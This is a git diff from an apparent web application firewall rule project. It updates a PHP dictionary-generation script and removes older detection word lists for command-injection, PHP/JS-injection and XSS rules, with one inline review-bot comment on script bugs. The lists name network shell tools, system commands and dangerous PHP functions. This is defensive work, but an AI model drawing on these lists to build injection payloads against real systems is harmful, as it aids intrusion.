file. Attempting to add." + NUM=$(get_frequency "$FUNCTION") + if [ -z "$NUM" ]; then + echo " Retrieving frequency failed. Cannot add item." 
+ else + echo " Adding entry for function $FUNCTION with frequency $NUM" + echo "$FUNCTION $NUM $MYDATE" >> "$PHP_FUNCTIONS_FREQUENCIES" + sort -o "$PHP_FUNCTIONS_FREQUENCIES" "$PHP_FUNCTIONS_FREQUENCIES" + fi + else + # function name found in frequency list + TIMESTAMP=$(grep -E "^$FUNCTION " "$PHP_FUNCTIONS_FREQUENCIES" | cut -d\ -f3) + TIMESTAMP_SECONDS=$(date -d "$TIMESTAMP" +%s 2>&1) # For MacOS users: gdate is needed instead of date + ERROR=$(($ERROR|$?)) # logical OR + break_on_error $ERROR "$TIMESTAMP_SECONDS\nError. Check that date is the GNU date binary from coreutils." + DIFF_SECONDS=$((MYDATE_SECONDS - TIMESTAMP_SECONDS)) + DIFF_DAYS=$(($DIFF_SECONDS / 86400)) + NUM=$(grep -E "^$FUNCTION " "$PHP_FUNCTIONS_FREQUENCIES" | cut -d\ -f2) + vprint "Function $FUNCTION exists (timestamp: $TIMESTAMP, age: $DIFF_DAYS, frequency: $NUM)" + if [ $DIFF_DAYS -gt "$AGE_LIMIT" ]; then + NUM=$(get_frequency "$FUNCTION") + if [ -z "$NUM" ]; then + echo "Entry for function $FUNCTION is too old. Updating failed. Removing record." + sed -i -e "/^$FUNCTION /d" "$PHP_FUNCTIONS_FREQUENCIES" + else + echo "Entry for function $FUNCTION is too old. Updating with new data (new frequency: $NUM)." + sed -i -e "s/^$FUNCTION .*/$FUNCTION $NUM $MYDATE/" "$PHP_FUNCTIONS_FREQUENCIES" + fi + + fi + fi + +done +echo "Done creating / updating frequency list." + +# Step 6 - Filter 2: Output depending on frequency +echo "Starting filtering PHP functions names with frequency limit: $FREQUENCY_LIMIT..." 
+cat "$PHP_FUNCTIONS_FREQUENCIES" | cut -d\ -f1 | while read -r FUNCTION; do + NUM=$(grep -E "^$FUNCTION " "$PHP_FUNCTIONS_FREQUENCIES" | cut -d\ -f2) + if [ -n "$NUM" ] && [ "$NUM" -gt "$FREQUENCY_LIMIT" ]; then + if [ "$DO_RULE_933150" == "1" ]; then + echo "Function \"$FUNCTION\" (frequency $NUM) added to $R933150_FILENAME" + echo "$FUNCTION" >> "$TMP_PHP_FUNCTIONS_FREQUENT" + fi + else + if [ "$DO_RULE_933151" == "1" ]; then + echo "Function \"$FUNCTION\" (frequency $NUM) added to $R933151_FILENAME" + echo "$FUNCTION" >> "$TMP_PHP_FUNCTIONS_RARE" + fi + fi +done + +echo "Done filtering PHP functions names." +if [ -s "$TMP_PHP_FUNCTIONS_FREQUENCIES_ERRORS" ]; then + FAILED_COUNTER=$(echo "$PHP_FUNCTIONS_FREQUENCIES_ERRORS" | wc -l | xargs echo) + echo -n "Failed to retrieve frequency for $FAILED_COUNTER function(s)" + if [ $VERBOSE -eq 1 ]; then + echo ":" + cat "$TMP_PHP_FUNCTIONS_FREQUENCIES_ERRORS" + else + echo "." + fi +fi + +if [ "$DO_RULE_933150" == "1" ]; then + # 933150 comes with a second source of non english words high-risk php functions. + # Any occurrence that is part of that list and not already in 933150 is now added. + cat "$HIGH_RISK_FUNCTIONS_FILENAME" | while read -r HIGH_RISK_FUNC; do + if [ $(grep -c -E "^$HIGH_RISK_FUNC$" "$TMP_PHP_FUNCTIONS_FREQUENT") -eq 0 ]; then + # we have to add this function to 933150 + echo "High-risk function \"$HIGH_RISK_FUNC\" added to $R933150_FILENAME" + echo "$HIGH_RISK_FUNC" >> "$TMP_PHP_FUNCTIONS_FREQUENT" + else + echo "High-risk function \"$HIGH_RISK_FUNC\" already present in $R933150_FILENAME" + fi + + done + sort -o "$TMP_PHP_FUNCTIONS_FREQUENT" "$TMP_PHP_FUNCTIONS_FREQUENT" + echo "File $R933150_FILENAME updated." + echo "$PHP_DICTIONARY_GEN_PREFIX" > $DATA_FILE_PATH$R933150_FILENAME + cat "$TMP_PHP_FUNCTIONS_FREQUENT" >> $DATA_FILE_PATH$R933150_FILENAME +fi +if [ "$DO_RULE_933151" == "1" ]; then + echo "File $R933151_FILENAME updated." 
+ echo "$PHP_DICTIONARY_GEN_PREFIX" > $DATA_FILE_PATH$R933151_FILENAME + cat "$TMP_PHP_FUNCTIONS_RARE" >> $DATA_FILE_PATH$R933151_FILENAME +fi + +if [ "$DO_RULE_933161" == "1" ]; then + echo '933161.ra file updated, mind to run "crs-toolchain regex update --all" before committing changes' +fi + +TIME_END=$(date +"%s") +echo "The script took $((TIME_END-MYDATE_SECONDS)) seconds to complete." + + +# -------------------------------------------------- +# Cleanup +# -------------------------------------------------- + +# Temp files are cleaned via trap set above. diff --git a/util/regexp-assemble/regexp-933160.data b/util/php-dictionary-gen/php-high-risk-functions.txt similarity index 92% rename from util/regexp-assemble/regexp-933160.data rename to util/php-dictionary-gen/php-high-risk-functions.txt index ed5190b19c..78b698521f 100644 --- a/util/regexp-assemble/regexp-933160.data +++ b/util/php-dictionary-gen/php-high-risk-functions.txt @@ -11,15 +11,13 @@ array_udiff_uassoc array_uintersect array_uintersect_assoc array_uintersect_uassoc -assert -assert_options +base64_decode base64_encode bson_decode bson_encode +bzdecompress bzopen -chr convert_uuencode -create_function curl_exec curl_file_create curl_init @@ -27,23 +25,14 @@ debug_backtrace error_reporting escapeshellarg escapeshellcmd -eval -exec exif_imagetype exif_read_data exif_tagname exif_thumbnail -file -file_exists -fileatime -filectime -filegroup -fileinode -filemtime -fileperms finfo_open fopen fputs +fsockopen ftp_connect ftp_get ftp_nb_get @@ -52,7 +41,12 @@ ftp_put function_exists fwrite get_cfg_var +get_class_methods +get_class_vars get_current_user +get_defined_constants +get_defined_functions +get_defined_vars get_meta_tags getcwd getenv @@ -62,13 +56,15 @@ getmygid getmyinode getmypid getmyuid -glob gzcompress +gzdecode gzdeflate +gzinflate gzencode gzfile gzopen gzread +gzuncompress gzwrite hash_file hash_hmac_file 
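Review bot: `FAILED_COUNTER=$(echo "$PHP_FUNCTIONS_FREQUENCIES_ERRORS" | wc -l | xargs echo)` counts the lines of a variable that is never assigned (the file is `TMP_PHP_FUNCTIONS_FREQUENCIES_ERRORS`), so the summary always reports 1 failed function; use `FAILED_COUNTER=$(wc -l < "$TMP_PHP_FUNCTIONS_FREQUENCIES_ERRORS")`. That same `mktemp` file is missing from the `trap 'rm -rf ...' INT TERM EXIT` list, so every run leaves it behind. The `--rules` validation calls a bare `exit` inside a `while read` fed by a pipe, which only ends the subshell and with status 0, so an unknown rule prints the fatal message and the script carries on; feed the loop with a here-string, `done <<<"$(echo "$RULES_CMDLINE" | tr " " "\n")"`, and make it `exit 1`. In `get_frequency` the comment says 50 seconds while the code runs `sleep 25`, and `GITHUB_TOKEN` is never checked, so an unset token sends an empty Bearer header five times before giving up; `: "${GITHUB_TOKEN:?GITHUB_TOKEN must be set}"` next to the other parameter checks fails fast instead.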
@@ -89,11 +85,6 @@ imagecreatefromxbm imagecreatefromxpm imagegd imagegd2 -imagegif -imagejpeg -imagepng -imagewbmp -imagexbm ini_get ini_get_all ini_set @@ -132,10 +123,9 @@ odbc_exec odbc_execute odbc_result odbc_result_all -opendir parse_ini_file parse_str -passthru +pfsockopen pg_connect pg_execute pg_prepare @@ -144,12 +134,12 @@ php_strip_whitespace php_uname phpinfo phpversion -popen posix_getegid posix_geteuid posix_getgid posix_getlogin posix_getpwnam +posix_getpwuid posix_kill posix_mkfifo posix_mknod @@ -171,7 +161,6 @@ rawurldecode rawurlencode read_exif_data readdir -readfile readgzfile register_shutdown_function register_tick_function @@ -194,6 +183,7 @@ set_include_path set_magic_quotes_runtime setdefaultstub sha1_file +shell_exec show_source simplexml_load_file simplexml_load_string @@ -214,13 +204,11 @@ stream_socket_client stripcslashes stripslashes strrev -system -tmpfile uasort uksort -unpack unserialize urldecode urlencode usort var_dump +zlib_decode diff --git a/util/regexp-assemble/regexp-932100.txt b/util/regexp-assemble/regexp-932100.txt deleted file mode 100644 index f1cfb57602..0000000000 --- a/util/regexp-assemble/regexp-932100.txt +++ /dev/null 
@@ -1,168 +0,0 @@
-# Word list for rule 932100 (RCE Unix command injection part 1/3)
-#
-# To convert to a regexp that can be pasted into the rule:
-# cat regexp-932100.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl
-#
-# Entries starting with ' are used verbatim.
-# Everything after # is a comment.
-#
-# To prevent some FP for a command, you can require command parameters
-# after a command. Only do this if the command regularly causes FP and if
-# allowing the bare command (without parameters) is not too dangerous.
-# (Note: due to \b following the regexp, a word boundary is also required
-# further on, so some letter/number is needed for a match). Example:
-#
-# diff+
-
-# Special regexp case for the '.' (source) command to prevent FP:
-'\.\s.*
-
-7z
-7za
-7zr
-adduser
-alias+
-apt-get
-arch+
-arp
-awk+
-bash
-batch+
-breaksw
-bsdcat
-bsdiff
-bsdtar
-builtin
-bzcat
-bzdiff
-bzegrep
-bzfgrep
-bzgrep
-bzip2
-bzless
-bzmore
-cat+
-cc+
-chattr
-chdir+
-chflags
-chmod
-command+
-compress+
-coproc
-cp+
-crontab
-csh
-curl
-dash
-dhclient
-diff+
-dmesg
-doas
-done
-dpkg
-du+
-echo+
-egrep
-endif
-endsw
-env
-env-update
-esac
-eval
-exec+
-expand
-export
-expr
-fc+
-fetch+
-fgrep
-fi
-file+
-filetest
-find+
-foreach
-ftp+
-ftpstats
-ftpwho
-function
-gcc+
-gdb
-GET+
-getfacl+
-git+
-grep+
-gunzip
-gzcat
-gzip
-head+
-history
-hostid
-hostname
-htdigest
-htpasswd
-hup+
-# 'id' causes way too much FP, so we require whitespace; this will allow
-# injecting ';id' unfortunately.
-id+
-ifconfig
-ip6tables
-ipconfig
-iptables
-irb
-irb1
-irb18
-irb19
-irb20
-irb21
-irb22
-java+
-jexec
-jobs+
-kill+
-killall
-last+
-lastcomm
-lastlog
-lastlogin
-ldconfig
-ldd+
-less+
-lessecho
-lessfile
-lesspipe
-lftp
-lftpget
-ln+
-local+
-locate+
-logname
-lp+
-ls
-ls-F
-lsb_release
-lscpu
-lshw
-lsmod
-lsof
-lspci
-lsusb
-lwp-download
-lwp-dump
-lwp-mirror
-lwp-request
-lynx+
-lzcat
-lzcmp
-lzdiff
-lzegrep
-lzfgrep
-lzgrep
-lzless
-lzma
-lzmore
-mailq
-mailx+
-mkdir+
-mlocate
-more+
diff --git a/util/regexp-assemble/regexp-932105.txt b/util/regexp-assemble/regexp-932105.txt
deleted file mode 100644
index e2bce21457..0000000000
--- a/util/regexp-assemble/regexp-932105.txt
+++ /dev/null
@@ -1,174 +0,0 @@
-# Word list for rule 932105 (RCE Unix command injection part 2/3)
-#
-# To convert to a regexp that can be pasted into the rule:
-# cat regexp-932105.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl
-#
-# Entries starting with ' are used verbatim.
-# Everything after # is a comment.
-#
-# To prevent some FP for a command, you can require command parameters
-# after a command. Only do this if the command regularly causes FP and if
-# allowing the bare command (without parameters) is not too dangerous.
-# (Note: due to \b following the regexp, a word boundary is also required
-# further on, so some letter/number is needed for a match). Example:
-#
-# diff+
-
-mount+
-mutt+
-mv+
-mysql
-mysqladmin
-mysqldump
-mysqldumpslow
-mysqlhotcopy
-mysqlshow
-nano+
-nc+
-nc.openbsd
-nc.traditional
-ncat
-net+
-netcat
-netkit-ftp
-netstat
-nice+
-nmap
-nohup
-nping
-nslookup
-nstat
-onintr
-openssl
-passwd
-patch+
-perl
-perl5
-perlsh
-perms
-pftp
-pgrep
-php
-php5
-php7
-ping
-pkexec
-pkg
-pkg_info
-pkginfo
-pkill
-popd
-printenv
-printf+
-ps+
-ptar
-ptardiff
-ptargrep
-pushd
-python
-python2
-python3
-python3m
-rar+
-rcp+
-realpath
-rename+
-repeat+
-replace+
-rm+
-rmdir+
-rmuser
-rnano
-route
-rpm+
-rsync
-ruby
-ruby1
-ruby18
-ruby19
-ruby20
-ruby21
-ruby22
-sched
-scp+
-sdiff
-sed+
-sendmail
-set+
-setenv
-setfacl+
-setsid
-sftp
-sh+
-sh.distrib
-shutdown
-sleep
-socat
-sort+
-source+
-ssh
-strings
-su+
-sudo
-svn
-sysctl
-tail
-tailf
-tar+
-tcping
-tcptraceroute
-tcsh
-tee+
-telnet
-time+
-timeout
-top
-touch+
-traceroute
-traceroute6
-ulimit+
-uname
-uncompress
-unlink+
-unlzma
-unrar
-unset
-unxz
-unzip
-useradd
-userdel
-usermod
-vigr
-vim+
-vipw
-w3m
-wget
-# 'who' causes many FP, so require whitespace.
-# Unfortunately, without whitespace it may still leak some info.
-who+
-whoami
-xargs
-xterm
-xxd+
-xz+
-xzcat
-xzcmp
-xzdec
-xzdiff
-xzegrep
-xzfgrep
-xzgrep
-xzless
-xzmore
-yum
-zcat
-zcmp
-zdiff
-zegrep
-zfgrep
-zgrep
-zip+
-zless
-zmore
-zrun
-zsh
diff --git a/util/regexp-assemble/regexp-932106.txt b/util/regexp-assemble/regexp-932106.txt
deleted file mode 100644
index 138764face..0000000000
--- a/util/regexp-assemble/regexp-932106.txt
+++ /dev/null
@@ -1,26 +0,0 @@
-# Word list for rule 932106 (RCE Unix command injection part 3/3)
-#
-# To convert to a regexp that can be pasted into the rule:
-# cat regexp-932106.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl
-#
-#
-# Entries starting with ' are used verbatim.
-# Everything after # is a comment.
-#
-# To prevent some FP for a command, you can require command parameters
-# after a command. Only do this if the command regularly causes FP and if
-# allowing the bare command (without parameters) is not too dangerous.
-# (Note: due to \b following the regexp, a word boundary is also required
-# further on, so some letter/number is needed for a match). Example:
-#
-# diff+
-
-vi+
-ps
-pwd
-who
-w+
-aptitude+
-pacman+
-dnf+
-up2date+
diff --git a/util/regexp-assemble/regexp-932110.txt b/util/regexp-assemble/regexp-932110.txt
deleted file mode 100644
index b964661515..0000000000
--- a/util/regexp-assemble/regexp-932110.txt
+++ /dev/null
@@ -1,164 +0,0 @@
-# Word list for rule 932110 (RCE Windows command injection part 1/2)
-#
-# To convert to a regexp that can be pasted into the rule:
-# cat regexp-932110.txt | ./regexp-cmdline.py windows | ./regexp-assemble.pl
-#
-# Entries starting with ' are used verbatim.
-# Everything after # is a comment.
-#
-# To prevent some FP for a command, you can require command parameters
-# after a command. Only do this if the command regularly causes FP and if
-# allowing the bare command (without parameters) is not too dangerous.
-# (Note: due to \b following the regexp, a word boundary is also required
-# further on, so some letter/number is needed for a match). Example:
-#
-# diff@
-
-7z
-7za
-7zr
-addusers
-admodcmd
-arp@
-assoc
-attrib
-azman
-bcdboot
-bcdedit
-bitsadmin
-bootcfg
-browstat
-cacls
-call@
-certreq
-certutil
-#disabled for FP: change
-chdir@
-chkdsk
-chkntfs
-cipher
-cleanmgr
-clearmem
-cluster
-cmd
-cmdkey
-comexp
-comp@
-compact@
-compmgmt
-con2prt
-convert
-copy
-csccmd
-cscript
-csvde
-curl
-date@
-dcomcnfg
-debug
-defrag
-del@
-delprof
-deltree
-devcon
-devmgmt
-diff@
-dir@
-diruse
-diskmgmt
-diskpart
-diskshadow
-dnsstat
-doskey
-driverquery
-dsacls
-dsadd
-dsget
-dsmod
-dsmove
-dsquery
-dsrm
-dxdiag
-echo
-egrep
-endlocal
-erase
-eventcreate
-eventvwr
-expand@
-explorer
-fc@
-fgrep
-find@
-findstr
-foreach
-forfiles
-format@
-freedisk
-fsmgmt
-fsutil
-ftp@
-ftype
-gathernetworkinfo
-getmac
-git@
-gpedit
-gpresult
-gpupdate
-hdwwiz
-hostname
-icacls
-ifmember
-inetcpl
-ipconfig
-irb
-irb1
-irb18
-irb19
-irb20
-irb21
-irb22
-java@
-label@
-logevent
-logman
-logoff
-logtime
-lusrmgr
-mapisend
-mbsacli
-md@
-mdsched
-measure
-mkdir@
-mklink
-mmsys
-mode@
-more@
-mount@
-mountvol
-moveuser
-msconfig
-msg@
-msiexec
-msinfo32
-mstsc
-mysql
-mysqladmin
-mysqldump
-mysqldumpslow
-mysqlhotcopy
-mysqlshow
-nbtstat
-nc@
-ncat
-net@
-netcat
-netdom
-netsh
-netstat
-netsvc
-nmap
-nslookup
-ntbackup
-ntrights
diff --git a/util/regexp-assemble/regexp-932115.txt b/util/regexp-assemble/regexp-932115.txt
deleted file mode 100644
index cdbdf7d71a..0000000000
--- a/util/regexp-assemble/regexp-932115.txt
+++ /dev/null
@@ -1,164 +0,0 @@
-# Word list for rule 932115 (RCE Windows command injection part 2/2)
-#
-# To convert to a regexp that can be pasted into the rule:
-# cat regexp-932115.txt | ./regexp-cmdline.py windows | ./regexp-assemble.pl
-#
-# Entries starting with ' are used verbatim.
-# Everything after # is a comment.
-#
-# To prevent some FP for a command, you can require command parameters
-# after a command. Only do this if the command regularly causes FP and if
-# allowing the bare command (without parameters) is not too dangerous.
-# (Note: due to \b following the regexp, a word boundary is also required
-# further on, so some letter/number is needed for a match). Example:
-#
-# diff@
-
-odbcad32
-odbcconf
-openfiles
-path@
-pathping
-perfmon
-perl
-perl5
-perlsh
-php
-php5
-php7
-ping
-pkgmgr
-popd
-portqry
-powercfg
-powershell
-powershell_ise
-print@
-printbrm
-prncnfg
-prnmngr
-prompt
-psexec
-psfile
-psgetsid
-psinfo
-pskill
-pslist
-psloggedon
-psloglist
-pspasswd
-psping
-psservice
-psshutdown
-pssuspend
-pushd
-python
-python2
-python3
-python3m
-qgrep
-qprocess
-query@
-qwinsta
-rar@
-rasdial
-rasphone
-rd@
-recdisc
-recover
-reg@
-regedit
-regini
-regsvr32
-rekeywiz
-ren@
-rename@
-replace@
-reset@
-rm@
-rmdir@
-rmtshare
-robocopy
-route@
-rstrui
-rsync
-ruby1
-ruby18
-ruby19
-ruby20
-ruby21
-ruby22
-runas
-rundll32
-schtasks
-sclist
-secpol
-select
-set@
-setlocal
-setx@
-sfc
-share
-shellrunas
-shift
-shortcut
-showgrps
-showmbrs
-shrpubw
-shutdown
-sigverif
-sleep
-slmgr
-sort
-start@
-subinacl
-subst
-svn
-sysdm
-syskey
-systeminfo
-systempropertiesadvanced
-systempropertiesdataexecutionprevention
-systempropertieshardware
-systempropertiesperformance
-takeown
-taskkill
-tasklist
-taskmgr
-taskschd
-telnet
-timeout
-tlist
-tpminit
-tracert
-tree
-tsdiscon
-tsshutdn
-type@
-typeperf
-unrar
-unzip
-useraccountcontrolsettings
-usrstat
-verify
-vol@
-waitfor
-wevtutil
-wget
-#disabled for FP: where@
-whoami
-windiff
-winmsdp
-winrm
-winrs
-winvar
-wmic
-wmimgmt
-wscript
-wscui
-wuapp
-wuauclt
-wusa
-xcacls
-xcopy
-zip@
diff --git a/util/regexp-assemble/regexp-932130.data b/util/regexp-assemble/regexp-932130.data
deleted file mode 100644
index a9561c3eea..0000000000
--- a/util/regexp-assemble/regexp-932130.data
+++ /dev/null
@@ -1,5 +0,0 @@
-\$\(.*\)
-\$\{.*\}
-<\(.*\)
->\(.*\)
-\$\(\(.*\)\)
diff --git a/util/regexp-assemble/regexp-932150.txt b/util/regexp-assemble/regexp-932150.txt
deleted file mode 100644
index caaa8c4adf..0000000000
--- a/util/regexp-assemble/regexp-932150.txt
+++ /dev/null
@@ -1,203 +0,0 @@
-# Word list for rule 932150 (RCE Unix command injection)
-# To lower FP, this rule requires whitespace after a command.
-#
-# To convert to a regexp that can be pasted into the rule:
-# cat regexp-932150.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl
-#
-# Entries starting with ' are used verbatim.
-# Everything after # is a comment.
-#
-
-bash
-bsdcat
-bsdiff
-bsdtar
-builtin
-bzcat
-bzdiff
-bzegrep
-bzfgrep
-bzgrep
-bzless
-bzmore
-cc
-command
-coproc
-csh
-curl
-dash
-diff
-dmesg
-doas
-echo
-egrep
-env
-eval
-exec
-fetch
-fgrep
-filetest
-ftpstats
-ftpwho
-gcc
-GET
-grep
-gzcat
-gzip
-head
-hup
-irb
-irb1
-irb18
-irb19
-irb20
-irb21
-irb22
-java
-jobs -x
-lastcomm
-lastlog
-lastlogin
-lessecho
-lessfile
-lesspipe
-lftp
-lftpget
-ls
-ls-F
-lsb_release
-lscpu
-lsmod
-lsof
-lspci
-lsusb
-lwp
-lwp-download
-lynx
-lzcat
-lzcmp
-lzdiff
-lzegrep
-lzfgrep
-lzgrep
-lzless
-lzma
-lzmore
-mailq
-mlocate
-mysqladmin
-mysqldump
-mysqldumpslow
-mysqlhotcopy
-mysqlshow
-nc
-nc.openbsd
-nc.traditional
-ncat
-netcat
-netkit-ftp
-netstat
-nohup
-nping
-nstat
-onintr
-perl
-perl5
-pftp
-pgrep
-php
-php5
-php7
-ping
-pkexec
-pkill
-popd
-printenv
-ptar
-ptardiff
-ptargrep
-python
-python2
-python3
-python3m
-rcp
-realpath
-rename
-repeat
-replace
-rmdir
-rmuser
-rnano
-rsync
-ruby
-ruby1
-ruby18
-ruby19
-ruby20
-ruby21
-ruby22
-sched
-scp
-sdiff
-sed
-sendmail
-setenv
-setsid
-sftp
-sh
-sh.distrib
-socat
-source
-ssh
-strings
-sudo
-svn
-sysctl
-tail
-tailf
-tar
-tcping
-tcptraceroute
-tcsh
-telnet
-time
-timeout
-traceroute
-traceroute6
-uname
-uncompress
-unlzma
-unrar
-unset
-unxz
-unzip
-useradd
-userdel
-usermod
-vigr
-vipw
-w3m
-wget
-whoami
-xargs
-xz
-xzcat
-xzcmp
-xzdec
-xzdiff
-xzegrep
-xzfgrep
-xzgrep
-xzless
-xzmore
-zcat
-zcmp
-zdiff
-zegrep
-zfgrep
-zgrep
-zip
-zless
-zmore
-zrun
-zsh
diff --git a/util/regexp-assemble/regexp-933161.data b/util/regexp-assemble/regexp-933161.data
deleted file mode 100644
index 113b9558db..0000000000
--- a/util/regexp-assemble/regexp-933161.data
+++ /dev/null
@@ -1,202 +0,0 @@
-abs
-acos
-acosh
-array
-arsort
-asin
-asinh
-asort
-assert
-atan
-atan2
-atanh
-basename
-bindec
-ceil
-chdir
-checkdate
-chmod
-chop
-chown
-chroot
-closedir
-closelog
-compact
-constant
-copy
-cos
-cosh
-count
-crypt
-current
-date
-decoct
-define
-defined
-die
-dir
-dirname
-diskfreespace
-dl
-doubleval
-each
-easter_date
-easter_days
-echo
-empty
-end
-ereg
-eregi
-error_log
-exit
-exp
-explode
-extract
-fclose
-feof
-fgets
-fileowner
-filepro
-filesize
-filetype
-floatval
-flock
-floor
-flush
-fmod
-fread
-fstat
-ftell
-ftok
-function
-getdate
-gettext
-gettype
-gmdate
-hash
-header
-headers_list
-headers_sent
-hebrev
-hypot
-iconv
-idate
-implode
-include
-intdiv
-intval
-invoke
-is_a
-is_array
-is_bool
-is_callable
-is_double
-is_finite
-is_float
-is_infinite
-is_int
-is_integer
-is_link
-is_long
-is_nan
-is_null
-is_numeric
-is_object
-is_real
-is_resource
-is_scalar
-is_string
-isset
-join
-key
-ksort
-lcfirst
-levenshtein
-link
-linkinfo
-list
-localtime
-log
-log10
-log1p
-lstat
-ltrim
-mail
-main
-max
-mbereg
-mbsplit
-metaphone
-mhash
-microtime
-min
-msql
-mysql
-natsort
-next
-octdec
-openlog
-ord
-pack
-pathinfo
-pclose
-pi
-pos
-pow
-prev
-print
-printf
-quotemeta
-rand
-range
-readline
-readlink
-recode
-rename
-require
-reset
-rewind
-round
-rsort
-rtrim
-scandir
-serialize
-settype
-shuffle
-similar_text
-sin
-sinh
-sizeof
-sleep
-sort
-soundex
-split
-spliti
-sprintf
-sqrt
-srand
-stat
-strcoll
-strlen
-strspn
-substr
-symlink
-syslog
-taint
-tan
-tanh
-tempnam
-textdomain
-time
-touch
-trim
-ucfirst
-umask
-uniqid
-unlink
-unset
-untaint
-usleep
-usort
-virtual
-wordwrap
diff --git a/util/regexp-assemble/regexp-934100.txt b/util/regexp-assemble/regexp-934100.txt
deleted file mode 100644
index 64065bc61d..0000000000
--- a/util/regexp-assemble/regexp-934100.txt
+++ /dev/null
@@ -1,8 +0,0 @@
-_\$\$ND_FUNC\$\$_
-__js_function
-\beval\s*\(
-String\s*\.\s*fromCharCode
-function\s*\(\s*\)\s*{
-new\s+Function\s*\(
-this\.constructor
-module\.exports\s*=
diff --git a/util/regexp-assemble/regexp-941130.data b/util/regexp-assemble/regexp-941130.data
deleted file mode 100644
index 80ea2def43..0000000000
--- a/util/regexp-assemble/regexp-941130.data
+++ /dev/null
@@ -1,10 +0,0 @@
-(?i)[\s\S]xlink:href\b
-(?i)[\s\S]xhtml\b
-(?i)[\s\S]xmlns\b
-(?i)[\s\S]!ENTITY\s+(?:\S+|%\s+\S+)\s+SYSTEM\b
-(?i)[\s\S]!ENTITY\s+(?:\S+|%\s+\S+)\s+PUBLIC\b
-(?i)[\s\S]data:text/html\b
-(?i)[\s\S]formaction\b
-(?i)[\s\S]@import\b
-(?i)[\s\S];base64\b
-(?i)[\s\S]pattern\b.*?=\b
diff --git a/util/regexp-assemble/regexp-941160.data b/util/regexp-assemble/regexp-941160.data
deleted file mode 100644
index 18f8d41b3d..0000000000
--- a/util/regexp-assemble/regexp-941160.data
+++ /dev/null
@@ -1,308 +0,0 @@
-<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?s\W*?c\W*?r\W*?i\W*?p\W*?t
-<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?f\W*?o\W*?r\W*?m
-<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?s\W*?t\W*?y\W*?l\W*?e
-<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?s\W*?v\W*?g
-<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?m\W*?a\W*?r\W*?q\W*?u\W*?e\W*?e
-<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?l\W*?i\W*?n\W*?k[^>\w]
-<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?o\W*?b\W*?j\W*?e\W*?c\W*?t[^>\w]
-<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?e\W*?m\W*?b\W*?e\W*?d[^>\w]
-<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?a\W*?p\W*?p\W*?l\W*?e\W*?t[^>\w]
-<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?p\W*?a\W*?r\W*?a\W*?m[^>\w]
-<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?i?\W*?f\W*?r\W*?a\W*?m\W*?e[^>\w]
-<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?b\W*?a\W*?s\W*?e[^>\w]
-<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?b\W*?o\W*?d\W*?y[^>\w]
-<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?m\W*?e\W*?t\W*?a[^>\w]
-<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?i\W*?m\W*?a?\W*?g\W*?e?[^>\w]
-<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?v\W*?i\W*?d\W*?e\W*?o[^>\w]
-<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?a\W*?u\W*?d\W*?i\W*?o[^>\w]
-<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?b\W*?i\W*?n\W*?d\W*?i\W*?n\W*?g\W*?s[^>\w]
-<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?s\W*?e\W*?t[^>\w]
-<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?a\W*?n\W*?i\W*?m\W*?a\W*?t\W*?e[^>\w]
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)background[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)formaction[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)lowsrc[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onAppCommand[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMActivate[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMAttrModified[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMCharacterDataModified[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMFocusIn[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMFocusOut[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMMouseScroll[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMNodeInsertedIntoDocument[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMNodeInserted[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMNodeRemovedFromDocument[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMNodeRemoved[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMSubtreeModified[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onLoad[\s\x08]*?=
-(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozAfterPaint[\s\x08]*?=
